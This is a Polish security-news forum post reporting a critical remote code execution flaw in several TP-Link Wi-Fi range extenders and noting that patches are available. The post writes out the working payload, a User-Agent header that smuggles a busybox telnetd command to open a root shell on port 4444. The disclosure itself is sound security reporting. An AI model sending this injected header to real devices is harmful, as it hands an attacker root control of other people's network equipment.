Krytyczna usterka RCE w urządzeniach TP-Link Wi-Fi

Grandalf

Grandalf

Bardzo aktywny
Członek Załogi
Moderator
Dołączył
26 Maj 2015
Posty
19243
Reakcje/Polubienia
56075
Zaloguj lub Zarejestruj się aby zobaczyć!
w extenderach TP-Linka znaleziona przez Grzegorza Wypycha. W żądaniu HTTP do urządzenia wystarczy ustawić nagłówek User-Agent na`chrome4hackerz; /bin/busybox telnetd -l /bin/sh -p 4444;`
(część po ` a przed pierwszym średnikiem – dowolna :) i mamy wykonanie kodu w OS jako root (w tym przypadku na porcie 4444 czeka na nas rootshell):

fig1-1000x345.png


fig2.png


Podatne modele RE365, RE650, RE350 and RE500. TP-link udostępnił stosowne łaty:
Zaloguj lub Zarejestruj się aby zobaczyć!

Zaloguj lub Zarejestruj się aby zobaczyć!

Zaloguj lub Zarejestruj się aby zobaczyć!

Zaloguj lub Zarejestruj się aby zobaczyć!
Kliknij aby rozwinąć...
źródło pl:
Zaloguj lub Zarejestruj się aby zobaczyć!

żródło eng:
Zaloguj lub Zarejestruj się aby zobaczyć!

 
Musisz się zalogować lub zarejestrować aby odpowiedzieć

Podobne tematy:

OXYGEN THIEF
Trojan w centralnym repozytorium JavaScript. Namierzyła go sztuczna inteligencja
Odpowiedzi
0
Wyświetleń
94
OXYGEN THIEF
OXYGEN THIEF
OXYGEN THIEF
Google profiluje dzieci bez zgody rodziców. Zbierają nawet odciski palców
Odpowiedzi
0
Wyświetleń
96
OXYGEN THIEF
OXYGEN THIEF
OXYGEN THIEF
Stracił pieniądze, bo na smartfonie wyskoczył mu cudzy BLIK do potwierdzenia
Odpowiedzi
0
Wyświetleń
123
OXYGEN THIEF
OXYGEN THIEF
OXYGEN THIEF
Chińscy hakerzy przez dwa lata mieli dostęp do belgijskich służb bezpieczeństwa
Odpowiedzi
0
Wyświetleń
131
OXYGEN THIEF
OXYGEN THIEF
OXYGEN THIEF
moje.cert.pl - Nowy serwis dla Polaków
Odpowiedzi
0
Wyświetleń
175
OXYGEN THIEF
OXYGEN THIEF
Do góry